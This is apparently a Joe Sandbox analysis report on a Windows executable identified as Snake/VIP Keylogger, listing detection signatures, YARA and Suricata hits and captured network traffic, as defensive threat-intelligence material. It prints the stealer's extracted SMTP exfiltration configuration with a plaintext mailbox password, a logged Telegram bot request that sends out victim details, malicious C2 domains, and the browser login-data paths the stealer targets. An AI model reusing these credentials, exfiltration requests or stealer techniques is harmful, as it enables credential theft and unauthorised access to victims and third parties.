Edit tour

Windows Analysis Report
TLS20242025.exe

Overview

General Information

Sample name:	TLS20242025.exe
Analysis ID:	1519460
MD5:	bfabeaf94d00b7c6b4af9aa3463ff5a5
SHA1:	0d9341d70a1e7e90c62ebcef43d1fcd2cf1b3506
SHA256:	e03a2edda2530392f416b8d64b85a3ae890120e6c6d08317d21ac133576cb45d
Tags:	exeuser-TeamDreier
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Machine Learning detection for sample

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

TLS20242025.exe (PID: 5748 cmdline: "C:\Users\user\Desktop\TLS20242025.exe" MD5: BFABEAF94D00B7C6B4AF9AA3463FF5A5)

TLS20242025.exe (PID: 5576 cmdline: "C:\Users\user\Desktop\TLS20242025.exe" MD5: BFABEAF94D00B7C6B4AF9AA3463FF5A5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-usering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "info@makupachemists.co.ke", "Password": "Makupa@2030#", "Host": "mail.makupachemists.co.ke", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "info@makupachemists.co.ke", "Password": "Makupa@2030#", "Host": "mail.makupachemists.co.ke", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d10f:$a1: get_encryptedPassword 0x2d424:$a2: get_encryptedUsername 0x2cf1f:$a3: get_timePasswordChanged 0x2d028:$a4: get_passwordField 0x2d125:$a5: set_encryptedPassword 0x2e7bd:$a7: get_logins 0x2e720:$a10: KeyLoggerEventArgs 0x2e385:$a11: KeyLoggerEventArgsEventHandler
00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x19c11f:$a1: get_encryptedPassword 0x1deb4f:$a1: get_encryptedPassword 0x22136f:$a1: get_encryptedPassword 0x19c434:$a2: get_encryptedUsername 0x1dee64:$a2: get_encryptedUsername 0x221684:$a2: get_encryptedUsername 0x19bf2f:$a3: get_timePasswordChanged 0x1de95f:$a3: get_timePasswordChanged 0x22117f:$a3: get_timePasswordChanged 0x19c038:$a4: get_passwordField 0x1dea68:$a4: get_passwordField 0x221288:$a4: get_passwordField 0x19c135:$a5: set_encryptedPassword 0x1deb65:$a5: set_encryptedPassword 0x221385:$a5: set_encryptedPassword 0x19d7cd:$a7: get_logins 0x1e01fd:$a7: get_logins 0x222a1d:$a7: get_logins 0x19d730:$a10: KeyLoggerEventArgs 0x1e0160:$a10: KeyLoggerEventArgs 0x222980:$a10: KeyLoggerEventArgs
Process Memory Space: TLS20242025.exe PID: 5748	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: TLS20242025.exe PID: 5748	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: TLS20242025.exe PID: 5748	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: TLS20242025.exe PID: 5748	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x8a85f:$a1: get_encryptedPassword 0x8aaca:$a2: get_encryptedUsername 0x8a692:$a3: get_timePasswordChanged 0x8a782:$a4: get_passwordField 0x8a875:$a5: set_encryptedPassword 0x8c6ea:$a7: get_logins 0x8c66b:$a10: KeyLoggerEventArgs 0x8c3e4:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: TLS20242025.exe PID: 5576	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: TLS20242025.exe PID: 5576	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: TLS20242025.exe PID: 5576	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: TLS20242025.exe PID: 5576	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2cabb:$a1: get_encryptedPassword 0x2cdc6:$a2: get_encryptedUsername 0x2c8d5:$a3: get_timePasswordChanged 0x2c9de:$a4: get_passwordField 0x2cad1:$a5: set_encryptedPassword 0x2ef59:$a7: get_logins 0x2eebc:$a10: KeyLoggerEventArgs 0x2eb25:$a11: KeyLoggerEventArgsEventHandler
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.TLS20242025.exe.3a92840.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.TLS20242025.exe.3a92840.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.TLS20242025.exe.3a92840.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.TLS20242025.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.TLS20242025.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.TLS20242025.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.TLS20242025.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.TLS20242025.exe.3a4fe10.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.TLS20242025.exe.3a4fe10.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.TLS20242025.exe.3a4fe10.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.TLS20242025.exe.3a4fe10.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2b50f:$a1: get_encryptedPassword 0x2b824:$a2: get_encryptedUsername 0x2b31f:$a3: get_timePasswordChanged 0x2b428:$a4: get_passwordField 0x2b525:$a5: set_encryptedPassword 0x2cbbd:$a7: get_logins 0x2cb20:$a10: KeyLoggerEventArgs 0x2c785:$a11: KeyLoggerEventArgsEventHandler
2.2.TLS20242025.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d30f:$a1: get_encryptedPassword 0x2d624:$a2: get_encryptedUsername 0x2d11f:$a3: get_timePasswordChanged 0x2d228:$a4: get_passwordField 0x2d325:$a5: set_encryptedPassword 0x2e9bd:$a7: get_logins 0x2e920:$a10: KeyLoggerEventArgs 0x2e585:$a11: KeyLoggerEventArgsEventHandler
2.2.TLS20242025.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b08a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a72d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3a98a:$a4: \Orbitum\User Data\Default\Login Data 0x3b369:$a5: \Kometa\User Data\Default\Login Data
0.2.TLS20242025.exe.3a4fe10.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3928a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3892d:$a3: \Google\Chrome\User Data\Default\Login Data 0x38b8a:$a4: \Orbitum\User Data\Default\Login Data 0x39569:$a5: \Kometa\User Data\Default\Login Data
0.2.TLS20242025.exe.3a4fe10.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c133:$s1: UnHook 0x2c13a:$s2: SetHook 0x2c142:$s3: CallNextHook 0x2c14f:$s4: _hook
2.2.TLS20242025.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2df33:$s1: UnHook 0x2df3a:$s2: SetHook 0x2df42:$s3: CallNextHook 0x2df4f:$s4: _hook
0.2.TLS20242025.exe.3a92840.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2b50f:$a1: get_encryptedPassword 0x2b824:$a2: get_encryptedUsername 0x2b31f:$a3: get_timePasswordChanged 0x2b428:$a4: get_passwordField 0x2b525:$a5: set_encryptedPassword 0x2cbbd:$a7: get_logins 0x2cb20:$a10: KeyLoggerEventArgs 0x2c785:$a11: KeyLoggerEventArgsEventHandler
0.2.TLS20242025.exe.3a92840.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3928a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3892d:$a3: \Google\Chrome\User Data\Default\Login Data 0x38b8a:$a4: \Orbitum\User Data\Default\Login Data 0x39569:$a5: \Kometa\User Data\Default\Login Data
0.2.TLS20242025.exe.3a92840.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c133:$s1: UnHook 0x2c13a:$s2: SetHook 0x2c142:$s3: CallNextHook 0x2c14f:$s4: _hook
0.2.TLS20242025.exe.3a92840.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.TLS20242025.exe.3a92840.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.TLS20242025.exe.3a92840.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.TLS20242025.exe.3a92840.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.TLS20242025.exe.3a92840.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d30f:$a1: get_encryptedPassword 0x6fb2f:$a1: get_encryptedPassword 0x2d624:$a2: get_encryptedUsername 0x6fe44:$a2: get_encryptedUsername 0x2d11f:$a3: get_timePasswordChanged 0x6f93f:$a3: get_timePasswordChanged 0x2d228:$a4: get_passwordField 0x6fa48:$a4: get_passwordField 0x2d325:$a5: set_encryptedPassword 0x6fb45:$a5: set_encryptedPassword 0x2e9bd:$a7: get_logins 0x711dd:$a7: get_logins 0x2e920:$a10: KeyLoggerEventArgs 0x71140:$a10: KeyLoggerEventArgs 0x2e585:$a11: KeyLoggerEventArgsEventHandler 0x70da5:$a11: KeyLoggerEventArgsEventHandler
0.2.TLS20242025.exe.3a92840.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b08a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7d8aa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a72d:$a3: \Google\Chrome\User Data\Default\Login Data 0x7cf4d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3a98a:$a4: \Orbitum\User Data\Default\Login Data 0x7d1aa:$a4: \Orbitum\User Data\Default\Login Data 0x3b369:$a5: \Kometa\User Data\Default\Login Data 0x7db89:$a5: \Kometa\User Data\Default\Login Data
0.2.TLS20242025.exe.3a92840.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2df33:$s1: UnHook 0x70753:$s1: UnHook 0x2df3a:$s2: SetHook 0x7075a:$s2: SetHook 0x2df42:$s3: CallNextHook 0x70762:$s3: CallNextHook 0x2df4f:$s4: _hook 0x7076f:$s4: _hook
0.2.TLS20242025.exe.3a4fe10.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.TLS20242025.exe.3a4fe10.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.TLS20242025.exe.3a4fe10.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.TLS20242025.exe.3a4fe10.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.TLS20242025.exe.3a4fe10.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d30f:$a1: get_encryptedPassword 0x6fd3f:$a1: get_encryptedPassword 0xb255f:$a1: get_encryptedPassword 0x2d624:$a2: get_encryptedUsername 0x70054:$a2: get_encryptedUsername 0xb2874:$a2: get_encryptedUsername 0x2d11f:$a3: get_timePasswordChanged 0x6fb4f:$a3: get_timePasswordChanged 0xb236f:$a3: get_timePasswordChanged 0x2d228:$a4: get_passwordField 0x6fc58:$a4: get_passwordField 0xb2478:$a4: get_passwordField 0x2d325:$a5: set_encryptedPassword 0x6fd55:$a5: set_encryptedPassword 0xb2575:$a5: set_encryptedPassword 0x2e9bd:$a7: get_logins 0x713ed:$a7: get_logins 0xb3c0d:$a7: get_logins 0x2e920:$a10: KeyLoggerEventArgs 0x71350:$a10: KeyLoggerEventArgs 0xb3b70:$a10: KeyLoggerEventArgs
0.2.TLS20242025.exe.3a4fe10.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b08a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7daba:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc02da:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a72d:$a3: \Google\Chrome\User Data\Default\Login Data 0x7d15d:$a3: \Google\Chrome\User Data\Default\Login Data 0xbf97d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3a98a:$a4: \Orbitum\User Data\Default\Login Data 0x7d3ba:$a4: \Orbitum\User Data\Default\Login Data 0xbfbda:$a4: \Orbitum\User Data\Default\Login Data 0x3b369:$a5: \Kometa\User Data\Default\Login Data 0x7dd99:$a5: \Kometa\User Data\Default\Login Data 0xc05b9:$a5: \Kometa\User Data\Default\Login Data
0.2.TLS20242025.exe.3a4fe10.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2df33:$s1: UnHook 0x70963:$s1: UnHook 0xb3183:$s1: UnHook 0x2df3a:$s2: SetHook 0x7096a:$s2: SetHook 0xb318a:$s2: SetHook 0x2df42:$s3: CallNextHook 0x70972:$s3: CallNextHook 0xb3192:$s3: CallNextHook 0x2df4f:$s4: _hook 0x7097f:$s4: _hook 0xb319f:$s4: _hook
0.2.TLS20242025.exe.3959d70.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.TLS20242025.exe.3959d70.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.TLS20242025.exe.3959d70.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.TLS20242025.exe.3959d70.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.TLS20242025.exe.3959d70.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1233af:$a1: get_encryptedPassword 0x165ddf:$a1: get_encryptedPassword 0x1a85ff:$a1: get_encryptedPassword 0x1236c4:$a2: get_encryptedUsername 0x1660f4:$a2: get_encryptedUsername 0x1a8914:$a2: get_encryptedUsername 0x1231bf:$a3: get_timePasswordChanged 0x165bef:$a3: get_timePasswordChanged 0x1a840f:$a3: get_timePasswordChanged 0x1232c8:$a4: get_passwordField 0x165cf8:$a4: get_passwordField 0x1a8518:$a4: get_passwordField 0x1233c5:$a5: set_encryptedPassword 0x165df5:$a5: set_encryptedPassword 0x1a8615:$a5: set_encryptedPassword 0x124a5d:$a7: get_logins 0x16748d:$a7: get_logins 0x1a9cad:$a7: get_logins 0x1249c0:$a10: KeyLoggerEventArgs 0x1673f0:$a10: KeyLoggerEventArgs 0x1a9c10:$a10: KeyLoggerEventArgs
0.2.TLS20242025.exe.3959d70.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x123fd3:$s1: UnHook 0x166a03:$s1: UnHook 0x1a9223:$s1: UnHook 0x123fda:$s2: SetHook 0x166a0a:$s2: SetHook 0x1a922a:$s2: SetHook 0x123fe2:$s3: CallNextHook 0x166a12:$s3: CallNextHook 0x1a9232:$s3: CallNextHook 0x123fef:$s4: _hook 0x166a1f:$s4: _hook 0x1a923f:$s4: _hook
Click to see the 34 entries

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T15:19:08.396649+0200	2803305	3	Unknown Traffic	192.168.2.6	49715	188.114.97.3	443	TCP
2024-09-26T15:19:10.641160+0200	2803305	3	Unknown Traffic	192.168.2.6	49720	188.114.97.3	443	TCP
2024-09-26T15:19:11.733633+0200	2803305	3	Unknown Traffic	192.168.2.6	49724	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T15:19:06.686781+0200	2803274	2	Potentially Bad Traffic	192.168.2.6	49710	193.122.130.0	80	TCP
2024-09-26T15:19:07.811792+0200	2803274	2	Potentially Bad Traffic	192.168.2.6	49710	193.122.130.0	80	TCP
2024-09-26T15:19:08.921191+0200	2803274	2	Potentially Bad Traffic	192.168.2.6	49717	193.122.130.0	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://aborters.duckdns.org:8081	URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081	URL Reputation: Label: malware

Found malware configuration

Source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@makupachemists.co.ke", "Password": "Makupa@2030#", "Host": "mail.makupachemists.co.ke", "Port": "587", "Version": "4.4"}
Source: 2.2.TLS20242025.exe.400000.0.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "info@makupachemists.co.ke", "Password": "Makupa@2030#", "Host": "mail.makupachemists.co.ke", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: TLS20242025.exe

ReversingLabs: Detection: 35%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: TLS20242025.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49713 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49734 version: TLS 1.2

Source: TLS20242025.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: TLS20242025.exe, 00000000.00000002.4587810220.0000000005200000.00000004.08000000.00040000.00000000.sdmp, TLS20242025.exe, 00000000.00000002.4585419626.000000000297D000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 4x nop then jmp 0105F45Dh	2_2_0105F2C0
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 4x nop then jmp 0105F45Dh	2_2_0105F52F
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 4x nop then jmp 0105F45Dh	2_2_0105F4AC
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 4x nop then jmp 0105FC19h	2_2_0105F974
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 4x nop then jmp 067D31E0h	2_2_067D2DC8
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 4x nop then jmp 067DE501h	2_2_067DE258
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 4x nop then jmp 067D0D0Dh	2_2_067D0B30
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 4x nop then jmp 067D1697h	2_2_067D0B30
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 4x nop then jmp 067D2C19h	2_2_067D2968
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 4x nop then jmp 067DE0A9h	2_2_067DDE00
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 4x nop then jmp 067DE959h	2_2_067DE6B0
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 4x nop then jmp 067DF209h	2_2_067DEF60
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 4x nop then jmp 067DCF49h	2_2_067DCCA0
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 4x nop then jmp 067DD7F9h	2_2_067DD550
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 4x nop then jmp 067D31E0h	2_2_067D2DB8
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 4x nop then jmp 067DEDB1h	2_2_067DEB08
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 4x nop then jmp 067DF661h	2_2_067DF3B8
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_067D0040
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 4x nop then jmp 067DFAB9h	2_2_067DF810
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 4x nop then jmp 067DD3A1h	2_2_067DD0F8
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 4x nop then jmp 067D31E0h	2_2_067D310E
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 4x nop then jmp 067DDC51h	2_2_067DD9A8

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:123716%0D%0ADate%20and%20Time:%2026/09/2024%20/%2020:05:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20123716%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49717 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49710 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49715 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49724 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49720 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
